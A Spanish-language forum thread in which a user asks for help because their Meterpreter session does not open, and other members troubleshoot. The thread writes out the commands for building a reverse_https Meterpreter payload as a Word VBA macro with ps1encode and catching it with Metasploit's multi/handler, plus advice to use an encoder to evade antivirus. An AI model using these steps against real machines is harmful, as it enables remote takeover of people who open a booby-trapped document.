no abre sesion meterpreter

Iniciado por maximuzve, Enero 18, 2018, 01:56:30 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Enero 18, 2018, 01:56:30 AM Ultima modificación: Enero 18, 2018, 02:15:15 AM por Gabriela
hola realize un ejecutable para poder ingresar a windows 10 ( todo en ambiente controlado mi equipo) y la sesion de meterpreter no me abre? me dice lo siguente meterpreter session 1 opened mi ip de la maquina virtual y abre responde donde uso windows 10 que es la mia se abre la sesion cuando quiero usar el comando para ingresar a directorio o manejarme por el cli ,nunca abre meterpreter como deberia si no que se queda en  exploit handler............. gracias

podrias dar detalle como estas creando el payload y cuales son tu pasos de metasploit. El exploit no esta en modo escucha por que conseguiste el cli pero no te genero el meterpreter puede ser que no generaste un meterpreter reverse_tcp por eso quiero ver lo que haces para ver el problema y ayudarte.

Saludos.





Enero 18, 2018, 05:10:57 PM #2 Ultima modificación: Enero 18, 2018, 06:05:00 PM por xyz
ok empiezo use este encoder

Enlace: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ps1encode  , copie la dirección para poderla clonar y con el comando
cree una carpeta llamada GitHud
ingrese en ella

Código: php
gitclone
ls ( para ver la carpeta)
ps1encode/           
ps1encode.rb   ( ejecuto la herramienta)


Código: php
./ps1encode   -i 192.168.0.109 -p 442  -a windows/meterpreter/reverse_https  -t vba


me creo un shellcode  lo copie..

(ABRO UNA NUEVA TERMINAL)

Código: php
msfconsole


Código: php
use exploit multi/handler 
set payload/windows/meterpreter/reverse_https
set lhost 192.168.0.109
set port 442
exploit

started https reverse handler on https// 192.168.0.109


y listo creo el archivo en work lo envio a mi propia maquina habilito los macros y me dice que:
open sesion 1 y si cierro el archivo y abro nuevamente una y otra vez dice open 2 open 3 ect...

el problema es lo que te nombre que no cae en la sesion del meterpreter queda en exploit handler como te dije gracias

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
podrias dar detalle como estas creando el payload y cuales son tu pasos de metasploit. El exploit no esta en modo escucha por que conseguiste el cli pero no te genero el meterpreter puede ser que no generaste un meterpreter reverse_tcp por eso quiero ver lo que haces para ver el problema y ayudarte.

Saludos.
amigo estoy esperando tu ayuda

aah claro que te sale sesiones 2, 3, 4. por que estas generado sesiones aunque ataques el mismo PC las secciones se van generando no se concentra una sesión fija en una cierta maquina.

Ya pero cuando abres la sesion te aparecen en la pantalla
Código: php
meterpreter >

Por que lo otro lo que dijiste al principio "cuando quiero usar el comando para ingresar a directorio o manejarme por el cli" puede ser que estés ocupado comando de windows y no de linux recuerda que estas en una consola de linux.

y el segundo poste me dijiste "queda en exploit handler" es por que no estas en escucha puede ser que no ejecuto el macro o el anti-virus el puerto por que el esta en la escucha esperando respuesta y no va a ver respuesta si no ejecutan el encode

No me dijiste la IP de tu maquina atacante y victima cuando generas el encode "ps1encode" el comando -i va la ip de tu maquina atacante. capas que te puedes a ver equivocado.





Enero 25, 2018, 10:42:32 AM #5 Ultima modificación: Enero 25, 2018, 10:44:11 AM por Unname
Buenas,

Como te dijo puntoCL, las veces que ejecutes el payload en la victima será la cantidad de sesiones que tengas nuevas, en tu consola del exploit handler podrás ver las activas con el comando "sessions" y recuerda que si lo que quieres hacer es un reverse_tcp_shell debes cargar en el payload  tu ip ya que lo que quieres es una conexión reversa.

Me quedó una duda, consigues meterpreter o no? 

PD: si lo tuyo fue un ejecutable pasale un shikata_ga_nai quizas sea el antivirus de la pc victima que te corta.